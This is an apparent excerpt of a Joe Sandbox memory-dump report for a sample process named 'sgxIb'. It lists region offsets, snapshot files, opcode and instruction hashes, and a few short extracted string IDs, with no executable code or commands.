                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7f027419a1b47a4caa3952cc6a8b5399cdcd6ebbfe0db3fded488fd11bba952
                                              • Instruction ID: 56439371397de3352af0440b1b6271ba4fe46fb2e1553e01e0deda8c225da596
                                              • Opcode Fuzzy Hash: e7f027419a1b47a4caa3952cc6a8b5399cdcd6ebbfe0db3fded488fd11bba952
                                              • Instruction Fuzzy Hash: 3021A0B47002068FCB05DB78E954A6E7BBAEFC9304F204479E509E3396DA389C06C792
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd72f67f2477188cc192774b3a012ec25d101619bff74b7ced41cbf827d7285a
                                              • Instruction ID: 9873f21949b44cc49c338721536f6e0a8f9394b3b4e94d9d3a1c1502aed94263
                                              • Opcode Fuzzy Hash: cd72f67f2477188cc192774b3a012ec25d101619bff74b7ced41cbf827d7285a
                                              • Instruction Fuzzy Hash: 04315AB4A0024ADFCF05CFA9D844ADEBFF2FF89300F1484AAE414AB261D7359950CB50
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ab146aaa76e083ea106e3ae4fc9f2314f762da0a578aa918a1089fe760c55715
                                              • Instruction ID: 08f3b7fb6c41b0943f88c3101571e98c744bf0fb043680f5be241f79aac042e2
                                              • Opcode Fuzzy Hash: ab146aaa76e083ea106e3ae4fc9f2314f762da0a578aa918a1089fe760c55715
                                              • Instruction Fuzzy Hash: 22216B75F002159FDB50CFA9E981AEEBBF5EB88710F108025E945E7385E639DD01CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f46db2fde322493b0d00fa5e6370dd72c7c5080aeae3cf5f256a4b8db73ee0bc
                                              • Instruction ID: 289ad011edfebdb1604d28fa8a18e66f60f01767c88ae830bb2f9a36651aabfe
                                              • Opcode Fuzzy Hash: f46db2fde322493b0d00fa5e6370dd72c7c5080aeae3cf5f256a4b8db73ee0bc
                                              • Instruction Fuzzy Hash: AE212A75F006159FDB50CF69E980AEEB7F5EB88710F10802AE905E7385E639DD01CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f17ff806b1b4dc9f26435aeddf14098c65e79111b73335ef2117c21992138e5
                                              • Instruction ID: 1ec49e57444fa14156f899b022df7ce5c8918ad8008f1494d4f3cd742e845e72
                                              • Opcode Fuzzy Hash: 0f17ff806b1b4dc9f26435aeddf14098c65e79111b73335ef2117c21992138e5
                                              • Instruction Fuzzy Hash: 4F21AFB47002069FCB04DB78E944A6F7BAAEBC8350F204439E509E3355DA399C02C792
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba5c0a1a4cecfc9452a920c626159bc41bca0e4022c4e70343fc6ee006c6435b
                                              • Instruction ID: aa9ad96d8c55b85121b1de8c07c5a63dfc567ab6443d6f2f79d520efb5660d7e
                                              • Opcode Fuzzy Hash: ba5c0a1a4cecfc9452a920c626159bc41bca0e4022c4e70343fc6ee006c6435b
                                              • Instruction Fuzzy Hash: 6F31E2B0D01259EFDB10DFA9C958BDEBFB5BB49310F24802AE404AB340C7B59845CFA0
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 719f43bce3025c986150eca1db5c694e0cfcceb2a873a2f93702fe998db5cc96
                                              • Instruction ID: b53ca17aa857f660ddf573431a7867472259ad3a78558cf7f41827b2137b5170
                                              • Opcode Fuzzy Hash: 719f43bce3025c986150eca1db5c694e0cfcceb2a873a2f93702fe998db5cc96
                                              • Instruction Fuzzy Hash: 512122B1504204DFDB55DF98D980F26BBA9FB84718F20C56DDD0A4B356C33AD447CA62
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46fb1211fb7cc12384baa73bb8406411574c40d426a456e93b011c5ee8a26273
                                              • Instruction ID: 074d4a9321f17f0bcbb3dde0915b29ccbeb8e6461db707b80007c9fbb024af56
                                              • Opcode Fuzzy Hash: 46fb1211fb7cc12384baa73bb8406411574c40d426a456e93b011c5ee8a26273
                                              • Instruction Fuzzy Hash: 98214671504204DFDB51CF98D980F26BB69FB84728F20C569EC090B346C37AD446CAA2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37bf46bb157bedee1f4d02c8f658c19d94989c36f12ce3632e02d9cb5d95149e
                                              • Instruction ID: fa683561f4747c6bcdece4f7be1e5a70f762417df84c8a73b5f33bf7fa43987d
                                              • Opcode Fuzzy Hash: 37bf46bb157bedee1f4d02c8f658c19d94989c36f12ce3632e02d9cb5d95149e
                                              • Instruction Fuzzy Hash: 802100B1600244DFCB45DFA8D580F26BF69EB88718F20C56DDD094B256C73AE846CA62
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 979c5bb4ed51d19bd46f37ca040383cc9dcee1d385c289e30fd9e9ae653f2df3
                                              • Instruction ID: 126ce6db9c2be996c5b48e025fc3aaaf1ab5ffe2f581daa1d91f4ccacb2f0505
                                              • Opcode Fuzzy Hash: 979c5bb4ed51d19bd46f37ca040383cc9dcee1d385c289e30fd9e9ae653f2df3
                                              • Instruction Fuzzy Hash: 10216071D10719CBDF64CFAAC8406DEBBB5FF85300F10452AD446EB244DB709845CB81
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0fd4c4ce569642d07fb9d5540f767c397ba7082d1c71a02418187e95c6f60010
                                              • Instruction ID: 9ac40c8c1926a6026aff726821cdd98ba06bde3ec8965db7d66547ee1ab8d6a3
                                              • Opcode Fuzzy Hash: 0fd4c4ce569642d07fb9d5540f767c397ba7082d1c71a02418187e95c6f60010
                                              • Instruction Fuzzy Hash: ED31C1B0C11218EFDB24DF99C598BDEBFB5BB48710F24842AE408AB350C7B59845CBA5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3245f441559c44c5794f1c0c3e1e62f9bc5957b06df08823bb8ee1e608bc0dc
                                              • Instruction ID: f64e569178e9942a212637aa9ee2e6a4c0b6478a2caefd9769e2998d5dfde7f4
                                              • Opcode Fuzzy Hash: a3245f441559c44c5794f1c0c3e1e62f9bc5957b06df08823bb8ee1e608bc0dc
                                              • Instruction Fuzzy Hash: 0A1103712013128FC718AF78D48456ABBF6FF863547208A7EC00A8B754DB36ED46CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45f3dca8d9064f2bffede2b27c9342308f1f898f7885b803cc9512b578fb54b5
                                              • Instruction ID: 62e0d62d6da3c157da70380c02bc18ba7a6fbf6deb20298bae24f5925516cd25
                                              • Opcode Fuzzy Hash: 45f3dca8d9064f2bffede2b27c9342308f1f898f7885b803cc9512b578fb54b5
                                              • Instruction Fuzzy Hash: AD217F755093C08FD707CB64D990B11BF71AB46214F29C5EBD8898F2A7C23A984ACB62
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0bf3408c1c4d0c17df796ab427a3f397f3c4c809e1b64a873bc37911da882721
                                              • Instruction ID: 98a1db9b3b8610ddd865945eb69a7d178a864a4fc91da929191687b081bee70e
                                              • Opcode Fuzzy Hash: 0bf3408c1c4d0c17df796ab427a3f397f3c4c809e1b64a873bc37911da882721
                                              • Instruction Fuzzy Hash: 1A11BFB1E00224CACB94DBA8DC411EEF7B5EB88310F0595AAD406E7308EA30D941CBE5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d309a3745960909407e6eba938de858a354c0fa9faff3c0dd2479bd19832e0f
                                              • Instruction ID: fe461d17ac08512ece9befa815a872814c2fd58063c4fe4d3ea59735a40e9248
                                              • Opcode Fuzzy Hash: 6d309a3745960909407e6eba938de858a354c0fa9faff3c0dd2479bd19832e0f
                                              • Instruction Fuzzy Hash: F7117C32F101259BDB54DA68D8146EF73FAEBC8255B058539D40AE7348EE29DC028BD1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 820c431aa2483563c79a33fad390242fe8cbfada10673689de32679d648d13ad
                                              • Instruction ID: 1e6ef9f6c8ee64a32c5d64831cf93cf5d5670452f285c76ff65a27bd6c95bee7
                                              • Opcode Fuzzy Hash: 820c431aa2483563c79a33fad390242fe8cbfada10673689de32679d648d13ad
                                              • Instruction Fuzzy Hash: BB116D702013168FD728AF69D49465AB7EAFF85354B20893DC11A8B754DB36AC05CB90
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f5c6c3ff5d8082d435705352ff6b96f9a144e5debfc356f2f33eec78f7f3c86
                                              • Instruction ID: a6cae6def8229d085afba0890c55a24db311e864793426c40f0a2e02e5dfc4df
                                              • Opcode Fuzzy Hash: 9f5c6c3ff5d8082d435705352ff6b96f9a144e5debfc356f2f33eec78f7f3c86
                                              • Instruction Fuzzy Hash: 0C01B139B041504FCB66977DA8547AE7BE6DBC6624B10847AE00BCB354EA15DD034392
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1082a3e5acf4bd6f9e483a41c31eadbde1612e0db4f68d2f4dfaa8772b6083d6
                                              • Instruction ID: 9d5849b27ac2c94e392e58aebd662a6c7ab5db38ee1a0d4df7b5f665451a16f9
                                              • Opcode Fuzzy Hash: 1082a3e5acf4bd6f9e483a41c31eadbde1612e0db4f68d2f4dfaa8772b6083d6
                                              • Instruction Fuzzy Hash: 3B01F135B100100BDB68D66DD811B6FA7DADBC6224F288539E04FC339ADA25DC028391
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67c7ce5c69b99f229858f80acf96a1df93456fbccbd8e0c6d948e9e061ef04f3
                                              • Instruction ID: 86e5a29a425606a6f5f57bc29e86ecae2996339a23e6664d78dd463805158e24
                                              • Opcode Fuzzy Hash: 67c7ce5c69b99f229858f80acf96a1df93456fbccbd8e0c6d948e9e061ef04f3
                                              • Instruction Fuzzy Hash: D911C2B1E00224CFCB54DBB8D8411DEF7F5EB88310F15956AD446E7304EA30DA41DBA1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d95a0fce006a5c1c329bec52fcf4c5e5d0f4d622bc0775b77bcac52650175487
                                              • Instruction ID: 83d9474e8cc65b888362ec16a310f7c282f9f7362b44c3c84719173284e82248
                                              • Opcode Fuzzy Hash: d95a0fce006a5c1c329bec52fcf4c5e5d0f4d622bc0775b77bcac52650175487
                                              • Instruction Fuzzy Hash: 6021C0B1D01259AFCB40DF9AD884ADEFBB8FB49310F50812AE918B7201C374A954CBE5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4514673446.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_7490000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 140f25836be53384f622ec9f839e5ba3d3a5f82a2a8db818e7bb694fdfebfb7d
                                              • Instruction ID: 284b897c0b2f2c02b5148f26dcfd4fbed8dc725eff0de7ee273e004987d48cfb
                                              • Opcode Fuzzy Hash: 140f25836be53384f622ec9f839e5ba3d3a5f82a2a8db818e7bb694fdfebfb7d
                                              • Instruction Fuzzy Hash: 7411E0B46143079FC7649B2895885A3BFA6BB96640B0888AFD04287681D736EC42CB91
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 275fb9b9698828210728b244f0323af4c85ceacec6b5fd3eebbfc96d99daac5c
                                              • Instruction ID: 7682c11fa966eea49c1689570a7317f00424df4dd67e7564b36bc2b29475d5a2
                                              • Opcode Fuzzy Hash: 275fb9b9698828210728b244f0323af4c85ceacec6b5fd3eebbfc96d99daac5c
                                              • Instruction Fuzzy Hash: 7821C2B5D01219AFCB00DF9AD885ADEFBB8FB49310F10812AE918B7300C374A954CBE5
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4490962178.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_135d000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-981061697
                                              • Opcode ID: 9bbe58de30192ba85e411eea81e4d954de0a0412169a00f7cf8c47eda6288d35
                                              • Instruction ID: 3ce3738892fb8cb04604a8bcd12a505dd216804f4a37d22405104873d77d97ad
                                              • Opcode Fuzzy Hash: 9bbe58de30192ba85e411eea81e4d954de0a0412169a00f7cf8c47eda6288d35
                                              • Instruction Fuzzy Hash: 29F11B34B00209CFDB59DF68D554AAEB7B6FFC4704F248568D406AB3A8DB799C42CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                              • API String ID: 0-3723351465
                                              • Opcode ID: 72a8fc31b9234b8593d62006ea0adb048514c65e171d0241ede69be59e041e87
                                              • Instruction ID: 71f02976deb2c3fa24d91e9f8690657991e844d72abadadeca4dd26f6246fdf3
                                              • Opcode Fuzzy Hash: 72a8fc31b9234b8593d62006ea0adb048514c65e171d0241ede69be59e041e87
                                              • Instruction Fuzzy Hash: A9719C30A00219CFDB68CF69E9506AEB7F6FF84304B10952AD4479B258DF79ED46CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: d0533016afa0c30cd639ae6a737b8a9aaa9abefa8d5cae296b74b4716e497a31
                                              • Instruction ID: 12ee4a86d5a7a26fe688c384befa4b7c7c4a74051710804ae3814c974ca152b9
                                              • Opcode Fuzzy Hash: d0533016afa0c30cd639ae6a737b8a9aaa9abefa8d5cae296b74b4716e497a31
                                              • Instruction Fuzzy Hash: 89B10934E00209CFDB58DFA9D5906AEB7B6FF84704F249929D406AB358DB75DC86CB80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LR]q$LR]q$$]q$$]q
                                              • API String ID: 0-3527005858
                                              • Opcode ID: 3133b935259a274542deafd60eee47f7d0ea0a67e25588149061182214a02897
                                              • Instruction ID: b021d6d4211dcd2e736c135414fd58f84d07bb089da3e27a01196c3be0917a8b
                                              • Opcode Fuzzy Hash: 3133b935259a274542deafd60eee47f7d0ea0a67e25588149061182214a02897
                                              • Instruction Fuzzy Hash: E6518130B00205DFDF58DF28D940AAAB7FAFF85704B149568E4079B3A9DA38EC41CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.4513106351.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6db0000_sgxIb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $]q$$]q$$]q$$]q
                                              • API String ID: 0-858218434
                                              • Opcode ID: 5f65bdb2f8c5b485c56d2e91255dddc347892108faa48160da650bef895b8623
                                              • Instruction ID: 2e8f00680634578a13f13024c46cbba086fae6dcef5fbb83fa82989192a043ed
                                              • Opcode Fuzzy Hash: 5f65bdb2f8c5b485c56d2e91255dddc347892108faa48160da650bef895b8623
                                              • Instruction Fuzzy Hash: 99517D34F10205CFDBA9DF68D5806EDB7B2EB89314F18952AE416EB258DB35DC42CB90